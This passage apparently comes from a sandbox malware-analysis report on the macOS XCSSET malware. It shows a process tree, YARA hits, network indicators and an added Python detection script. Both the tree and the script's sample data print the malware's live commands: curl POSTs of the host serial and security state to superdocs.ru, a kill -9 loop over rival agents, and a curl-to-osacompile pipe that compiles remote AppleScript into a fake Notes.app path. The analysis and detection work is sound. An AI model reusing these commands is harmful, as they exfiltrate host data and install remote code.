            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c csrutil status | grep -q enabled && echo 1 || echo 0
              • bash New Fork (PID: 1061, Parent: 1060)
              • csrutil (MD5: 51e2d23508016b3dba2263fd13f74859) Arguments: csrutil status
              • bash New Fork (PID: 1062, Parent: 1060)
              • grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep -q enabled
            • sh New Fork (PID: 1063, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c sysctl -n machdep.cpu.brand_string
            • sysctl (MD5: 340b13a50d8ee5cfcc91d8480aa5cbe6) Arguments: sysctl -n machdep.cpu.brand_string
            • sh New Fork (PID: 1064, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'
              • bash New Fork (PID: 1065, Parent: 1064)
              • ioreg (MD5: d03e2df1848ceb731ba4a8c3e82b2011) Arguments: ioreg -c IOPlatformExpertDevice -d 2
              • bash New Fork (PID: 1066, Parent: 1064)
              • awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk -F' /IOPlatformSerialNumber/{print $(NF-1)}
            • sh New Fork (PID: 1067, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -k -s --connect-timeout 14 -d 'MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l
            • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -k -s --connect-timeout 14 -d MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l
            • sh New Fork (PID: 1068, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ps aux | grep -E 'com.apple.net|com.utils.core|com.metal.core|agentde|canaryde|operade|speedde|edegede|firefoxde|yandexde|avatarde|bravede' | grep -v grep | awk '{print $2}' | xargs kill -9
              • bash New Fork (PID: 1069, Parent: 1068)
              • ps (MD5: 48b7f71ab3866eee46d3ef67f8233168) Arguments: ps aux
              • bash New Fork (PID: 1070, Parent: 1068)
              • grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep -E com.apple.net|com.utils.core|com.metal.core|agentde|canaryde|operade|speedde|edegede|firefoxde|yandexde|avatarde|bravede
              • bash New Fork (PID: 1071, Parent: 1068)
              • grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep -v grep
              • bash New Fork (PID: 1072, Parent: 1068)
              • awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk {print $2}
              • bash New Fork (PID: 1073, Parent: 1068)
              • xargs (MD5: 8f884810645d2a6e0b1a4d499993857c) Arguments: xargs kill -9
            • sh New Fork (PID: 1074, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c echo 'superdocs.ru' > ~/Library/Caches/GitServices/.domain
            • sh New Fork (PID: 1075, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'
              • bash New Fork (PID: 1076, Parent: 1075)
              • ioreg (MD5: d03e2df1848ceb731ba4a8c3e82b2011) Arguments: ioreg -c IOPlatformExpertDevice -d 2
              • bash New Fork (PID: 1077, Parent: 1075)
              • awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk -F' /IOPlatformSerialNumber/{print $(NF-1)}
            • sh New Fork (PID: 1078, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -k -s --connect-timeout 14 -d 'updated .domain with superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l
            • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -k -s --connect-timeout 14 -d updated .domain with superdocs.ru -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l
            • sh New Fork (PID: 1079, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c echo ~/Library/Caches/GitServices/.rep
            • sh New Fork (PID: 1080, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c date -r '/Users/pedro/Library/Caches/GitServices/.rep' +'%s' || echo 9999999999
              • bash New Fork (PID: 1081, Parent: 1080)
              • date (MD5: 9983eb16b31b7224ae79b51b2b49ee75) Arguments: date -r /Users/pedro/Library/Caches/GitServices/.rep +%s
            • sh New Fork (PID: 1082, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c date +'%s'
            • date (MD5: 9983eb16b31b7224ae79b51b2b49ee75) Arguments: date +%s
            • sh New Fork (PID: 1083, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c [ -d /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/ ] && echo '1' || echo '0'
            • sh New Fork (PID: 1084, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/'
            • mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/
            • sh New Fork (PID: 1085, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/remove_old.applescript | osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sound.app'
              • bash New Fork (PID: 1086, Parent: 1085)
              • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -sk -d user=pedro https://superdocs.ru/agent/scripts/remove_old.applescript
  • cleanup
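The command lines in the process tree above are a compact set of host-based indicators: a bootstrap POST to https://superdocs.ru/l that carries the machine serial, SIP and firewall state in the body and in custom X-Id/X-Users/X-Mod headers, a kill loop over competing agent names, the serial lookup through ioreg, staging directories disguised as an Apple group container, and a remote AppleScript fetched with curl and compiled straight to a .app with osacompile. The Python below is an added example written for this page, not Joe Sandbox or XCSSET code: it runs those checks over process command lines as an EDR or sandbox records them. The sample lines marked as copied are taken from the tree above, the benign ones are constructed, and the rule names are this example's own.

```python
"""Triage of process command lines for the XCSSET bootstrap behaviour shown above.

Added example for this page (not Joe Sandbox or XCSSET code). Rule names are
this example's own; the indicators come from the process tree.
"""
import re
from dataclasses import dataclass

# Agent names the sample kills with `xargs kill -9` (from the grep -E pattern above).
XCSSET_PROCESS_NAMES = frozenset({
    "com.apple.net", "com.utils.core", "com.metal.core", "agentde", "canaryde",
    "operade", "speedde", "edegede", "firefoxde", "yandexde", "avatarde", "bravede",
})
# Directories the sample writes to; the first mimics an Apple group container.
STAGING_DIRS = (
    "Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers",
    "Library/Caches/GitServices",
)
# Custom headers on the beacon to https://superdocs.ru/l (lower-cased for matching).
BEACON_HEADERS = frozenset({"x-id", "x-users", "x-mod"})

_CURL = re.compile(r"(^|\s)curl\s")
_SH_C = re.compile(r"^\s*(?:/bin/)?(?:ba)?sh\s+-c\s+(.*)$", re.S)
# Matches `-H X-Id: value` as the sandbox prints argv and `-H 'X-Id: value'` as typed in sh -c.
_HEADER = re.compile(r"-H\s+'?([A-Za-z][\w-]*):\s*([^\s']+)")
_OSACOMPILE = re.compile(r"curl\b.*\|\s*osacompile\b.*?-o\s+'?([^']+?)'?\s*$")


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def strip_sh_c(cmdline: str) -> str:
    """Return the inner command of `sh -c <cmd>`; other lines pass through unchanged."""
    m = _SH_C.match(cmdline)
    return m.group(1) if m else cmdline


def rule_kill_peers(cmd):
    """ps | grep <agent names> | xargs kill -9: removes rival or older agents."""
    if "kill -9" in cmd or "kill -KILL" in cmd:
        names = sorted(n for n in XCSSET_PROCESS_NAMES if n in cmd)
        if names:
            return Finding("kills_xcsset_peers", ", ".join(names))
    return None


def rule_beacon_headers(cmd):
    """curl with X-Id (serial), X-Users (account) and X-Mod (module) headers."""
    if not _CURL.search(cmd):
        return None
    headers = {name.lower(): value for name, value in _HEADER.findall(cmd)}
    hit = BEACON_HEADERS & set(headers)
    if hit:
        return Finding("c2_beacon_headers", "; ".join(f"{h}={headers[h]}" for h in sorted(hit)))
    return None


def rule_fingerprint_post(cmd):
    """The bootstrap POST body carries serial, SIP and firewall state in clear text."""
    if _CURL.search(cmd) and re.search(r"\b(Serial|SIP|Firewall):", cmd):
        return Finding("host_fingerprint_exfil", "serial/SIP/firewall state in POST body")
    return None


def rule_serial_query(cmd):
    """ioreg -c IOPlatformExpertDevice ... IOPlatformSerialNumber: machine serial lookup."""
    if "ioreg" in cmd and "IOPlatformExpertDevice" in cmd and "IOPlatformSerialNumber" in cmd:
        return Finding("serial_number_query", "ioreg IOPlatformSerialNumber")
    return None


def rule_remote_osacompile(cmd):
    """curl <url> | osacompile -x -o <app>: remote AppleScript compiled straight to disk."""
    m = _OSACOMPILE.search(cmd)
    return Finding("remote_applescript_compile", m.group(1)) if m else None


def rule_staging_dir(cmd):
    """Any write or mkdir that touches the disguised staging directories."""
    for d in STAGING_DIRS:
        if d in cmd:
            return Finding("writes_disguised_staging_dir", d)
    return None


RULES = (rule_kill_peers, rule_beacon_headers, rule_fingerprint_post,
         rule_serial_query, rule_remote_osacompile, rule_staging_dir)


def triage(cmdlines):
    """Return (cmdline, Finding) pairs for every rule each command line matches."""
    findings = []
    for line in cmdlines:
        cmd = strip_sh_c(line)
        findings.extend((line, f) for f in (rule(cmd) for rule in RULES) if f)
    return findings


def hit_rules(cmdlines):
    """Sorted names of all rules that fired, for a one-line verdict."""
    return sorted({f.rule for _, f in triage(cmdlines)})


# Sample input: the first seven lines are copied from the process tree above,
# the last three are constructed benign lines for contrast.
SAMPLE_CMDLINES = [
    "curl -k -s --connect-timeout 14 -d MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. "
    "Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz "
    "Default browser: com.apple.safari -H X-Id: C07GV0KZPJH8 -H X-Users: pedro "
    "-H X-Mod: bootstrap https://superdocs.ru/l",
    "sh -c ps aux | grep -E 'com.apple.net|com.utils.core|com.metal.core|agentde|canaryde|"
    "operade|speedde|edegede|firefoxde|yandexde|avatarde|bravede' | grep -v grep "
    "| awk '{print $2}' | xargs kill -9",
    "sh -c echo 'superdocs.ru' > ~/Library/Caches/GitServices/.domain",
    "sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\\' '/IOPlatformSerialNumber/{print $(NF-1)}'",
    "sh -c curl -k -s --connect-timeout 14 -d 'updated .domain with superdocs.ru' "
    "-H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l",
    "sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/"
    "Contents/Resources/Scripts/Containers/'",
    "sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/remove_old.applescript "
    "| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/"
    "Contents/Resources/Scripts/Containers/com.utils.core.sound.app'",
    "sh -c ioreg -l | head -n 5",                                           # constructed, benign
    "curl -s -H 'Accept: application/json' https://example.com/api/status",  # constructed, benign
    "ls -la /Users/pedro/Library/Caches",                                    # constructed, benign
]

if __name__ == "__main__":
    for line, f in triage(SAMPLE_CMDLINES):
        print(f"{f.rule:30} {f.detail}")
    print("rules hit:", hit_rules(SAMPLE_CMDLINES))
```

The rules key on the combination of behaviours rather than on the domain alone, because the `.domain` file written to `~/Library/Caches/GitServices` shows the C2 host is configurable; the serial-as-X-Id pattern, the curl-to-osacompile pipe and the fake Notes.app path survive a domain change.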
Source: exec.2430808
Rule: EXT_SUSP_OBFUSC_macOS_RootHelper_Obfuscated
Description: Yara for the public tool 'roothelper'. Used by XCSSET (https://gist.github.com/NullArray/f39b026b9e0d19f1e17390a244d679ec)
Author: im0prtp3
Strings:
  • 0x3f78:$a1: E: neither argv[0] nor $_ works.
  • 0x3f99:$c1: %s%s%s: %s\x0A
  • 0x3f60:$c2: x%lx
  • 0x3f65:$c3: =%lu %d
  • 0x3f6d:$c4: %lu %d%c
  • 0x36b1:$opcodes_3: E8 9A FD FF FF 8B 85 E8 FD FF FF 2B 85 D0 FD FF FF 83 C0 01 89 85 EC FD FF FF E9 0A 00 00 00

Source: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a
Rule: JoeSecurity_XCSSET
Description: Yara detected XCSSET
Author: Joe Security
    No Snort rule has matched

    Source: /usr/bin/curl (PID: 979) | Writes from socket in process: data
    Source: /usr/bin/curl (PID: 982) | Writes from socket in process: data
    Source: /usr/bin/curl (PID: 1034) | Writes from socket in process: data
    Source: /usr/bin/curl (PID: 1043) | Writes from socket in process: data
    Source: /usr/bin/curl (PID: 1067) | Writes from socket in process: data
    Source: /usr/bin/curl (PID: 1078) | Writes from socket in process: data
    Source: /usr/bin/curl (PID: 1086) | Writes from socket in process: data
    Source: unknown | Network traffic detected: HTTP traffic on port 443, 58 TCP flows using client ports 49301 through 49358; every port in that range is recorded in both directions (443 -> client port and client port -> 443)
    Source: global traffic | HTTP traffic detected:
        HTTP/1.1 403 Forbidden
        Server: nginx
        Date: Wed, 24 Aug 2022 09:18:41 GMT
        Content-Type: text/html
        Content-Length: 162
        Connection: close
    Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmp | String found in binary or memory: http://crl.apple.com/codesigning.crl0
    Source: applet, 00001023.00000508.1.0000000113511000.0000000113cdb000.r--.sdmp | String found in binary or memory: http://www.apple.com/Copyright
    Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmp, CodeResources.469.dr, com.apple.spx.plist.495.dr, Info.plist.468.dr, Info.plist.475.dr, sh-thd-4984109211.494.dr | String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
    Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmp | String found in binary or memory: http://www.apple.com/appleca/root.crl0
    Source: a.537.dr | String found in binary or memory: https://superdocs.ru/l
    Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmp | String found in binary or memory: https://www.apple.com/appleca/0
    Source: unknown | HTTP traffic detected:
        POST /apple/com.php HTTP/1.1
        Host: superdocs.ru
        User-Agent: curl/7.79.1
        Accept: */*
        Content-Length: 51
        Content-Type: application/x-www-form-urlencoded
    Source: /usr/bin/curl (PID: 979) | Reads from socket in process: data
    Source: /usr/bin/curl (PID: 982) | Reads from socket in process: data
    Source: /usr/bin/curl (PID: <